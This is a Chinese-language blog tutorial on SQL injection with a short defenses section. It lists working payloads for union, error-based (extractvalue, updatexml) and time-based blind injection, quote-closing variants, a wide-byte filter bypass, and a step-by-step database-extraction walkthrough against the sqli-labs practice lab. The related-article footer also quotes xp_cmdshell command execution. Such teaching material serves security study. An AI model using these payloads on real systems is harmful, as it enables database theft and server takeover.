SQL注入(简单易懂)

最新推荐文章于 2024-10-28 20:31:25 发布
最新推荐文章于 2024-10-28 20:31:25 发布
阅读量245 收藏
点赞数
文章标签: sql 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Liu_Cc_/article/details/134386174
版权

一、原理

SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被拖库、被删除、甚至整个服务器权限沦陷)

简单理解:前端传入的数据没有经过任何处理,直接当作sql语句的一部分执行

二、注入分类:

1.union联合注入

(1)前后两个select查询列数一致!!

(2)select不支持limit

(3)尽量保证数据类型一致

判断列数的方法:

        方法一 'union select 1,2,3,4 --+

        方法二 'order by 4 --+

payload

        ' union select database(),user(),version() # %

2.堆叠注入

用分号(;)间隔,通过一个payload执行多条sql语句

3.报错注入

原理:利用sql函数语法错误导致报错的同时将执行语句结果显示在页面中

常用payload

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e));

select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.盲注

(1)布尔盲注:正确和错误的回显有两种

(2)时间盲注:正确和错误的回显都一样

5.header和cookie注入

应用场景 针对跳转页面中需要将http请求报文信息写入到数据库,则可以直接改写报文值为payload,从而实现错误注入

通过写入或查询header或cookie值,导致被注入

6.外带注入

三、注入点类型

(1)字符型

                'or 0=0 --+
                " or 0=0 --+

(2)整数型  

                or 0=0 --+

(3)搜索型

                %  or 0=0 --+
                % ' or 0=0 --+
                % " or 0=0 --+

(4)特殊型

                ) or 0=0 --+
                ' ) or 0=0 --+
                " ) or 0=0 --+
                % ' ) or 0=0 --+
                % " ) or 0=0 --+
                 )) or 0=0 --+

四、常见的注入点类型

#

-- (杠杠空格)

--+ (杠杠加号)

--%20

--- 111(杠杠空格111)

/*sss*/

五、危害

1.获取webshell(前提:知道站点根目录;mysql开启了secure-file-priv参数;站库不能分离;mysql对站点根目录有写入权限)

2.执行系统命令

3.读取系统文件

4.拖库

六、绕过

1.宽字节注入绕过:通过%df%5c(\)结合成一个汉字,从而绕过sql注入的防护,继续sql注入

        前提条件:连接数据库的时候字符集必须为gbk;开启了转义

2.窄字节注入绕过:利用ascii吗和5c(\)结合成一个汉字绕过服务端的防护

七、防御

1.硬件安全设备:安恒、绿盟、奇安信、启明星辰等

2.软件层面:windows可以使用D盾;linux可以使用安全狗

3.代码层面:写waf,使用正则过滤,开启安全防护的函数( addslashes;htmlspecialchars;mysql_real_escape_string ),使用utf-8和转义符

八、以sql-lib为例判断sql注入的思路

1.联合注入流程

判断注入点类型

判断字段数

1' order by 3#

' or 1=1 order by 2# 

判断显错位

' union select 1,2#

判断库名

' union select user(),database()# 

判断表名

' union select 2,group_concat(table_name) from information_schema.tables where table_schema=database()#

判断列名

' union select 2,group_concat(column_name) from information_schema.columns where table_name='emails'# 

获取数据

' union select group_concat(id),group_concat(email_id) from emails#

2.时间盲注思路

第一
1' and sleep(5) --+ 判断类型
admin' and if(1=1,sleep(10),null)--+   #通过返回时间判断注入点类型 单引号 时间型盲注

第二 admin') and if(ascii(substr(database(),1,1))=1,sleep(10),null)#

第三 用burp抓包勾选列响应时间 第一个1和第三个1为payload

3.报错注入思路

1.判断注入点类型

2.使用报错注入的payload (记得改类型)

admin") and updatexml(1,concat('~',(select version())),0) #

Liu_Cc_
关注
关于sql注入中的 --+
内心不种满鲜花就会长满杂草
03-14 1万+
--+ sql注入过程中我们经常会碰到 --+这个东西,刚学习的小伙伴可能会对此有疑问,现在就来看看这个--+是一个什么东西。 其实 --在sql语句中起着注释的作用,将后面的语句注释掉,+ 则代表空格。为了更形象的显示,我们以sqli-labs 第一关来说明--+ 1. 在源码中添加语句,将我们执行的语句打印出来 echo "执行的sql语句:"."$sql"."<br>"; 看浏览器,我们输入的--+变成了--空格,此时--后面的语句被注释掉了,不会再...
关于SQL注入的#,--,--+的使用
qq_30889301的博客
05-24 1089
了解原理后便知道了–无法使用的原因,是因为–与后面的单引号连接在一起,无法形成有效的mysql语句。原因是url中#号是用来指导浏览器动作的(例如锚点),对服务器端完全无用。所以在注入时我们除了使用–+外,也可以使用–'来完成sql注入语句。在mysql中使用这个语句分析原因,输入后回车显示分号没有闭合。用来和后面的单引号分隔开,将后面的语句注释。有时发现URL中执行sql注入时#号无效。将#号改成url的编码%23就可以了。这里发现+号在语句中变成了空格。所以,HTTP请求中不包括#
玩转SQL注入,想零基础入门到精通(超详细),收藏这一篇就够了
Cairo_A的博客
09-11 1343
玩转SQL注入,想零基础入门到精通(超详细),收藏这一篇就够了
sql注入详解
m0_67392811的博客
06-12 6140
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
[极客大挑战 2019]LoveSQL
qq_37301470的博客
11-12 615
万能密码登录成功没有发现flag 判断藏在数据库里 check.php?username=1' or '1'='1&password=123456' or '1'='1 登陆成功返回的密码 7a2d6a8fd56b61a79bba61ee8f5ad02c 直接开始联合注入 check.php?username=1' union select 1,2,3%23&password=1 check.php?username=1' union select 1,2,database()%23&
SQL Injection with MySQL
11-11 1459
本文作者:angel文章性质:原创发布日期:2004-09-16本文已经发表在《黑客防线》7月刊,转载请注明。由于写了很久,随着技术的进步,本人也发现该文里有不少错误和罗嗦的地方。请各位高手看了不要笑。本文写于《Advanced SQL Injection with MySQL》之前一个月。声明  本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,本文所有
sql注入语句大全
weixin_34239169的博客
03-31 357
sql注入语句大全 --是否存在xp_cmdshell and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') --用xp_cmdshell执行命令 ;exec master..xp_cmdshell "net user name passwo...
SQL注入
weixin_33696106的博客
12-19 106
一、SQL注入简介   SQL注入SQL Injection),通过构建SQL代码相关的特殊输入,作为参数传递到服务器,服务器解析并执行SQL语句进而达到攻击者所要的操作。如:通过提交一段数据库查询代码,根据程序返回的结果,获得某些攻击者想得知的数据;或通过控制部分SQL语句,攻击者可以利用数据库的一些特性,直接获取数据库服务器的系统权限。   发生SQL注入的主要原因是程序没有细致地过滤用...
SQL注入语句 (很全)
02-02 734
1、返回的是连接的数据库名 and db_name()>0 2、作用是获取连接用户名 and user>0 3、将数据库备份到Web目录下面 ;backup database 数据库名 to disk='c:\inetpub\wwwroot\1.db';-- 4、显示SQL系统版本 and 1=(select @@VERSION) 或and 1=convert(...
五分钟快速搞懂什么是SQL注入-SQL注入详解(干货满满)
03-28
通过生动的例子和简单的故事,读者可以快速上手SQL注入,并在实际项目中应用。 ### 适用人群 本文适用于所有对SQL注入感兴趣的初学者,无论是计算机科学、网络安全专业的学生,还是希望在自己的项目中防范SQL注入的...
〖Python 数据库开发实战 - Python与MySQL交互篇②〗- SQL 注入攻击案例
热门推荐
易编橙 · 终身成长社群,相遇已是上上签!
08-22 4万+
上一章节,我们只是简单的了解了 MySQL Connector 的语法,完成了一个简单的案例。Python 语言操作数据库不是到这里就结束了后续还有很多高级的内容等着我们去学习,该章节我们就来学习一下对所有数据库都有效的 "SQL 注入攻击" 。
Web安全之SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖...今天由我给大家带来《web安全之SQL注入篇》系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
CTF-sql注入(get)【简单易懂
墨鱼菜鸡
09-10 358
目录 环境配置 信息探测 探测敏感信息 尝试弱口令登录 漏洞扫描 web漏洞扫描器owasp-zap 扫描结果 漏洞利用 存在sql注入漏洞 获取数据库 获取数据库下的表名 获取字段值 获取用户名和密码 登录系统 上传shell反弹权限 生成webshell 制作webshell 使用exploit 上传she...
SQL注入,手工注入,简单易懂,主要是资源好
最新发布
soskns的博客
10-28 549
-+';--+';
Sql注入
qq_46540840的博客
03-11 346
目录引言类型:工具:常用方式数据库一些函数和绕过方式(待补充)函数绕过方式数字字符注入[判断标准][1]第二种方法是使用Sqlmap 这里很是方便Bool 盲注法一 : 用bp 半自动化注入法二: 用py脚本实现注入Sql 注入用法一用法二用法三 引言 Sql注入漏洞是攻击者通过任意构造sql语句对网页数据库进行任意操作(增删改查) 这里讲述sql注入入门基础. 类型: 1. 数字型注入 2. 字符型注入 3. 布尔注入 4. 报错注入 5. Cookie注入 6. 还有一些头部注入 工具:
构筑Web安全防线:SQL注入深度剖析
"《Web安全之SQL注入攻击》晨讲由作者经过两个星期的构思,因电脑故障而推迟,旨在提供易于理解的专业知识。讲解内容包括三个部分:第一讲深入讲解SQL注入的基本概念,如如何在本地搭建测试环境,构造注入语句,阐述...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值